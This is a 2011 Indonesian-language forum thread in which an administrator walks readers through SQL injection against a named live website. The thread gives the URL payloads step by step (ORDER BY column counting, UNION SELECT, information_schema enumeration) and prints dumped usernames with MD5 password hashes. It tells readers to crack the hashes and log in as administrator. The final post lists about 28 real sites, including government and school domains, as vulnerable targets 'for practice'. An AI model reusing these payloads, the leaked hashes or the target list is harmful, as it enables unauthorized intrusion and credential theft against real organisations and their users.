[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
SQL Injection pada Web
satriaDate: Friday, 2011-08-05, 8:13 AM | Message # 1
Lieutenant colonel
Group: Administrators
Messages: 126
Reputation: 0
Status: Offline

Hallo semua… Sedikit ingin share tentang teknik SQL Injection pada halaman website…. teknik ini biasa digunakan oleh hacker sebagai awalan untuk mengambil alih sebuah website, deface, bahkan menjadi root… hehe dan masih banyak lag...i….

Sebagai contoh…. kita akan melakukan SQL Injection pada website berikut…. http://www.catun.info


1. Langkah pertama, Cari halaman pada website yang menampilkan sebuah informasi dari database…

http://www.catun.info/profile_​view.php?id=113

2. Tes Vuln-nya dengan menambahkan tanda petik (’) pada akhir address…

http://www.catun.info/profile_​view.php?id=113′

Browser akan menampilkan pesan error, itu tandanya website tersebut memiliki vuln SQL Injection…


3. Selanjutnya kita akan cari tau seberapa banyak colom dari tabel yang di tampilkan pada halaman tersebut, dengan cara menambahkan order by 1 — pada akhir brwser…

http://www.catun.info/profile_​view.php?id=113%20order%20by%2​01%20– Jalan normal


ganti dengan angka 20

http://www.catun.info/profile_​view.php?id=113%20order%20by%2​020%20– Error, ini tandanya jumlah kolom tidak sampai 20


ganti dengan angka 17

http://www.catun.info/profile_​view.php?id=113%20order%20by%2​017%20– Jalan normal


ganti dengan angka 18

http://www.catun.info/profile_​view.php?id=113%20order%20by%2​018%20– Error

Ini menginformasikan bahwa jumlah kolom yang ditampilkan adalah 17…

4. Selanjutnya kita gunakan perinta union select untuk menggabungkan informasi yang ditampilkan pada halaman website…. sebelumnya tambahkan – pada angka 113…

http://www.catun.info/profile....,16,17–

Akan tampil angka yang di posisikan sesuai dengan urutan kolom sebenarnya….

5. Cek versi dengan mengetik version() pada sembarang angka pada addres bar…

http://www.catun.info/profile....version (),3,4,5,6,7,8,​9,10,11,12,13,14,15,16,17–

tampil 5.0.51a-log, versi ini mendukung informartion_schema yang berguna untuk menampilkan isi tabel pada database…

6. Selanjutnya mengeluarkan isi tabel pada database… ganti version() dengan group_concat(table_name) dan tambahkan from information_schema.tables where table_schema=database()– pada akhir alamat

http://www.catun.info/profile...._concat (table_nam​e),3,4,5,6,7,8,9,10,11,12,13,1​4,15,16,17%20from%20informatio​n_schem a.tables%20where%20tabl​e_schema=database()–
 
satriaDate: Friday, 2011-08-05, 8:13 AM | Message # 2
Lieutenant colonel
Group: Administrators
Messages: 126
Reputation: 0
Status: Offline
akan tampil nama table disitu, disini kita coba cari tabel yang kira-kira menyimpan informasi tentang user login… terdapat sebuah tabel dengan nama users, selnjutnya kita akan tampilkan field2 yang ada pada tabel tersebut… ganti group_concat(table_name) dengan group_concat(column_name) dan ganti from information_schema.tables where table_schema=database()– dengan from information_schema.columns where table_name=0×7573657273–

Sebelumnya ubah nama tabel ke dalam bentuk hexa, gunakan website berikut untuk melakukannya http://www.swingnote.com/tools​/texttohex.php jangan lupa tambahkan karakter 0x

http://www.catun.info/profile...._concat (column_na​me),3,4,5,6,7,8,9,10,11,12,13,​14,15,16,17%20from%20informati​on_sche ma.columns%20where%20ta​ble_name=0×7573657273–

akan keluar nama2 kolom pada tabel user

7. Selanjutnya kita akan mengeluarkan isi dari tabel tersebut, pilih kolom2 yang menurut kita penting saja….

http://www.catun.info/profile...._concat (name,0×20​,pass,0×20),3,4,5,6,7,8,9,10,1​1,12,13,14,15,16,17%20from%20u​sers–

Disini saya tampilkan isi pada kolom name dan pass, yang berarti username dan password untuk login pada site tersebut.. untung2 kita bisa dapat login sebagai administrator….

hasilnya akan di keluar seperti ini….

admin c9fd3192ea0807efb3cf0bd6d564cc​41 ,iuiu c9fd3192ea0807efb3cf0bd6d564cc​41 ,orre fd41e12d031c2ed6cf888638e66be4​de ,guest c9fd3192ea0807efb3cf0bd6d564cc​41 ,test c9fd3192ea0807efb3cf0bd6d564cc​41 ,ghost9 f8162c4552f8d85f76bd4633b00c5a​98 ,calin c9fd3192ea0807efb3cf0bd6d564cc​41 ,ggg c9fd3192ea0807efb3cf0bd6d564cc​41 ,bandit 3335e92c15a9e0ba515c0219fb6b4f​67 ,Jeff Boy 16bdcbc8fcf5533f54f64ff9c05bbf​5e ,Karina 8c70e53caf96823e292f6264276c92​23 ,k1d0 d3018d3ccd01d717e6eb7760bdde3a​b2 ,braty e28e9b2242e579f40bc78d08628c72​97 ,creaM 2e970e822e1a8834203d06abb60f59​ec ,speed c9fd3192ea0807efb3cf0bd6d564cc​41 ,scooter c9fd3192ea0807efb3cf0bd6d564cc​41 ,beciy 62b2b4b303264f138ba96ea3de80d1​cc ,Catazx 63b4ec64d4a085d6172552b90badc5​ba ,DarKPrince 77ec4b0ae3815a1b2e12910db3291d​f6 ,icsulescu f63ed3300797216784db8387a2deaf​f0 ,Flower ac8adb4331dbfd804f2ba217208888​30 ,ExTaSy 3f5f252123b8f5ee4211bc1f908853​4c ,alin00 0cc175b9c0f1b6a831c399e2697726​61 ,crisz 0cc175b9c0f1b6a831c399e2697726​61 ,xall c9fd3192ea0807efb3cf0bd6d564cc​41

Password di simpan dalam bentuk MD5, silahkan cari website yang menyediakan fasilitas untuk mendecryptnya,,, hehe sebenarnya bukan mendecrypt karena MD5 tidak dapat di kembalikan ke bentuk semulanya, website tersebut menyediakan database MD5 yang nantinya akan di cocokkan dengan hash yang kita miliki untuk kemudian ditampilkan plain textnya….

Setelah kita berhasil mendapatkan user name dan password yang benar, Cari tempat untuk melakukan login dan masuk sebagai administrator menggunakan username dan password yang kita miliki……

 
satriaDate: Friday, 2011-08-05, 8:14 AM | Message # 3
Lieutenant colonel
Group: Administrators
Messages: 126
Reputation: 0
Status: Offline
Sekian tutorial singkat saya mengenai SQL Injection, bila kurang jelas silahkan ditanyakan, InsyaAllah akan saya jawab bila saya mampu menjawabnya….

dan untuk latihan, berikut saya lampirkan website2 yang memiliki vuln SQL Injection….

http://www.statebank1898.com/n​ews.asp?id=1

http://www.ssm.com.my/en/berit​a/news.php?id=57

http://www.blitzone.com.my/cyb​ercafe/show-news.php?id=5

http://www.bohol.ph/article.ph​p?id=110

http://www.klife.com.my/galler​y.php?id=9

http://www.nbbnet.gov.my/BioAr​ticle/article.php?id=305

http://www.westmont.com.my/pro​ject-show.php?id=28

http://www.viewsonic.com.my/my​/pr/show.php?id=8

http://www.catun.info/profile_​view.php?id=113

http://lin-online.web.id/produ​ct.php?id=1

http://fotografix.ca/viewPhoto​.php?id=455

http://www.mirthandbeauty.com/​mirth/vie … php?id=592

http://pcklab.com/viewphoto.ph​p?id=15

http://theatreview.org.nz/revi​ews/review.php?id=1988

http://www.pchardware.ro/Revie​ws/review.php?id=182

http://www.dvdfuture.com/revie​w.php?id=815

http://www.kraak.net/en/releas​es.php?ID=31

http://press.letsgohonduras.co​m/releases.php?id=39

http://www.naturetrust.bc.ca/r​eleases.php?id=5

http://www.popboomerang.com/re​leases.php?id=4

http://www.videoezy.co.id/deta​il.php?movie=563

http://www.proton-edar.com.my/​index.php … view&id=42

http://tpc.moh.gov.my/modules/​tinyevent … show&id=16

http://www.irelandpakistan.com​/gallery.php?id=51

http://www.magetan.go.id/next.​php?id=1

http://www.central-jkt.sch.id/​detail_news.php?id=27

http://www.sevilla.sch.id/deta​il_news.php?id=29

http://benuamobil.com/detail.p​hp?id=39
 
  • Page 1 of 1
  • 1
Search: